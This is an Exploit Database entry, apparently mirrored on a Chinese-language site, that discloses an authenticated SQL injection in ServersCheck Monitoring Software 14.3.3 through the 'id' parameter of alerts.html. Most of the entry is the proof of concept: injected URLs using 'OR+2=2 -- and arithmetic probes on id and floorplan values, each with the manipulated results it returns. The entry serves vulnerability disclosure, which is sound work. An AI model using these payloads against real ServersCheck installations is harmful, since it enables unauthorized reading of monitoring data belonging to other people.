ServersCheck Monitoring Software 14.3.3 – ‘id’ SQL Injection

• Exploit Database
• 111 阅读

• 作者： hyp3rlinx
  日期： 2018-10-23
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/45661/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59

  # Exploit Title: ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection # Author: John Page (aka hyp3rlinx) # Date: 2018-10-23 # Vendor: www.serverscheck.com # Software link: http://downloads.serverscheck.com/monitoring_software/setup.exe # CVE: N/A # References: # https://serverscheck.com/monitoring-software/release.asp # http://hyp3rlinx.altervista.org/advisories/CVE-2018-18550-SERVERSCHECK-MONITORING-SOFTWARE-SQL-INJECTION.txt   # Security Issue # ServersCheck Monitoring Software allows for SQL Injection by an authenticated user # via the alerts.html "id" parameter.   # Exploit/POC http://127.0.0.1:1272/alerts.html?id=18391   Result: Alerts History for SENSORXY No data available in table   Then using 'OR+2=2,   http://127.0.0.1:1272/alerts.html?id=18391+'OR+2=2+--+   Result:   Alerts History for test 155 a day ago CPU on 127.0.0.1 Status Change DOWN to OK 154 a day ago CPU on 127.0.0.1 Status Change OK to DOWN 153 a day ago test Status Change OK to DOWN Unable to connect to host     # SQL Injection - original page results successfully manipulated using 18391-2 # Examples:   http://127.0.0.1:1272/alerts.html?id=18391 No data available in table   Then using 34 minus 2,   http://127.0.0.1:1272/alerts.html?id=18391-2 153 a day ago test Status Change OK to DOWN Unable to connect to host   and minus 1,   http://127.0.0.1:1272/alerts.html?id=18391-1 155 a day ago CPU on 127.0.0.1 Status Change DOWN to OK 154 a day ago CPU on 127.0.0.1 Status Change OK to DOWN     http://127.0.0.1:1272/floorplans.html?floorplan=34 Floor Plan PLANXY   Then using 34 minus 2,   http://127.0.0.1:1272/floorplans.html?floorplan=34-2 Floor Plan 0